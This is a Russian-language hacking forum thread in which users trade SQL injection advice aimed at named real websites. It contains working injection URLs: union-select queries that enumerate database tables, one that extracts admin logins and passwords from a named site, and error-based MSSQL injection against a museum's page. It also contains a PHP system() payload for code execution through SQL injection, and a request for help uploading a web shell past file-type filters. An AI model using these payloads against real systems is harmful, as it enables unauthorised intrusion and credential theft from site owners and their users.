Pashkela я не это спрашивал , извините за кривой вопрос..... Jokester пардон , я только "смотрел" )))))
Доброго времени суток всем. Подскажите пож. как примерно должен выглядеть запрос ,если ошибка в Mysql выводится при подстановке запятой вот так: site.com/bla.php?id='5 Интересует именно конструкция запроса. Заранее благодарен за ответ.
Запрос для чего ? Что нужно узнать то ? Какие данные вытащить ?.. Я думаю так, товарищ, начинайте не спеша отсюда: https://forum.antichat.ru/thread104591.html потом плавно переходите сюда: https://forum.antichat.ru/threadnav43966-1-10.html ну а в идеале не побрезгуйте и этим: (с 1 по 22 включительно) http://www.sqlbook.ru/ удачи
Привет! Ребята такой вопрос изучаю сервак жервы и нашел /y_key_ec978e5d0cf6ceb1.html в что это может бить?
Grookle, сотни раз уже писано-переписано Подбор колонок: site.com/bla.php?id=5+order+by+1000/* Sql-Inj: site.com/bla.php?id=-999+union+select+1,2,table_name,4,5+from+information_schema.tables/*
http://www.powerhousemuseum.com/designersatwork/how.php?ID=10+or+1=(select+top+1+table_name+from+information_schema.tables)--+ mssql почитай http://forum.antichat.ru/thread30501.html
Смотри внимательно, пишет: Conversion failed when converting the nvarchar value 'Designers' to data type int. Designers - это и есть табла. ЗЫ: И пробел убери в ссылке.
Как эту расскрутить? Code: http://www.ncmec.eu/case.php?Id=1 Тут походу стоит ограничение на кол-во символов?!
2mailbrush Да, там действительно ограничение количества символов в урле: Code: http://www.ncmec.eu/case.php?Id=1*1*1*1*1*1*1*1*1*1*1--+ Query failed: SELECT * FROM caseTbl WHERE ID=1*1*; Code: http://www.ncmec.eu/case.php?Id=1+order+by+1--+ Query failed: SELECT * FROM caseTbl WHERE ID=1 or; ограничение на 3 символа после Id= На счёт обхода не скажу ничего, ибо не видел ни разу статтей на подобную тему, но по сути ограничение прописывается в настройках сервера...
-m0rgan-, почисти ПМ. Насчет поста http://forum.antichat.ru/showpost.php?p=1259709&postcount=9197 - скорее всего, ты тупишь. Смотри, выбраная БД - b35015_catalo, а для cizar_admin Code: http://www.tosport.ru/detail_-1247.html/**/union/**/select/**/1,2,table_schema,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/from/**/information_schema.tables/**/where/**/table_name=0x63697a61725f61646d696e b35015_a. Таким образом Code: http://www.tosport.ru/detail_-1247.html/**/union/**/select/**/1,2,concat_ws(0x3a,id,login,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/from/**/b35015_a.cizar_admin
Не не, тут явно в самом скрипте данные отрезаются, например, субстрингом: substr($_GET['Id'], 0, 4); . Инъекцию провести наврядли выйдет. (;
Да, скорее всего ты прав, ибо ограничение стиит только на параметры, а длинна ссыли может быть большой... Но здесь факт в том, что хз как такое ограничение обойти
-m0rgan-, не слышал о RFI SQL INJECTION, мб просто RFI? RFI/LFI - Remote File Include / Local File Inlude. Почитать: http://forum.antichat.ru/thread12123.html http://forum.antichat.ru/thread23501.html http://forum.antichat.ru/thread91807.html http://forum.antichat.ru/thread98525.html http://forum.antichat.ru/thread49775.html
-m0rgan- Возможно, ты имеешь в виду те случаи, когда из SQL-запроса возвращается имя файла, который затем инклудится, т.е. RFI (или LFI) проводится через SQL-инъекцию, типа: Code: http://www.site.com/index.php?id=-1+union+select+1,2,[RFI],4,5 ? Встречается иногда и PHP-injection (точнее, Code Execution, так как не только с php такое возможно) через SQL-injection , когда SQL-запрос возвращает код, который затем выполняется скриптом, тогда эксплуатация выглядит примерно так: Code: http://www.site.com/index.php?id=-1+union+select+1,2,'<?php system($_GET[a]); ?>',4,5&a=ls
приятного времени суток. Возник вопрос по поводу dx shell. хочу загрузить его на сайт ,через админку. но могу это сделать тока в формате : gif, jpg, png, htm, html, pdf, zip, swf, mp3, flv, doc, docx, xls, xlsx, rtf И почему то он у меня открывается в виде кода . подскажите ,kak правильно залить шелл и запустить
Не кидайте сильно в меня какашками так как я новичек ) подскажите что можно к примеру здесь сделать только надо заменить на password='1' вроде чет показывает но все равно ниче интересного
